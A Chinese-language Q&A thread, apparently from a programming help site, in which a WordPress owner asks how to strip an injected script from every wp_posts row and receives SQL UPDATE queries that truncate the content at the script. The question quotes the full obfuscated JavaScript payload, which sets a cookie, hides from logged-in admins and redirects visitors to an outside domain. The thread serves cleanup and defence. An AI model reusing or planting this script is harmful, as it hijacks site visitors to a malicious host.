我正在删除独立于文件的wordpress攻击,并使用恶意脚本更新所有wp_posts表。列post_content的示例如下:
<p>[/mvc_price_listing][/vc_column_inner][vc_column_inner width="1/2"][promo_banner image="9510"][/promo_banner][mvc_price_listing price_visibility="none" price_title="Ladrillo Fiscal Artesanal<br />
<small>Generico</small>" top_bg="#c41200"]</p>
<p>[/mvc_price_listing][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width="1/6"][/vc_column][/vc_row]</p>
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://ischeck.xyz/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
因此,我发现所有病毒脚本都位于内容的最后,长度是动态的,并且始终以“ var _0x2cf4”开头]
所以,我的问题是执行wp_posts表查询的工作,该表只用第一部分替换post_content的内容,直到找到“ var _0x2cf4”。
非常感谢:)
您可以使用字符串函数:
update wp_posts
set post_content = substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
locate('_0x2cf4', post_content)给出''_0x2cf4'中post_content的索引;然后,您可以从字符串开头到该位置减1进行所有操作。where子句可确保仅更新“被感染”的值。
在运行update查询之前,可以确保它通过以下select产生预期的结果:
select
post_content,
substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
from wp_posts
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
您实际上想删除<script>标签。所以我认为
UPDATE wp_posts SET post_content = SUBSTRING_INDEX(post_content, '<script>', 1);
将从头<script>开始删除所有内容,包括在内。
此外,我强烈建议您安装XSS防御插件和/或将<script(无右尖括号)设置为禁止的字。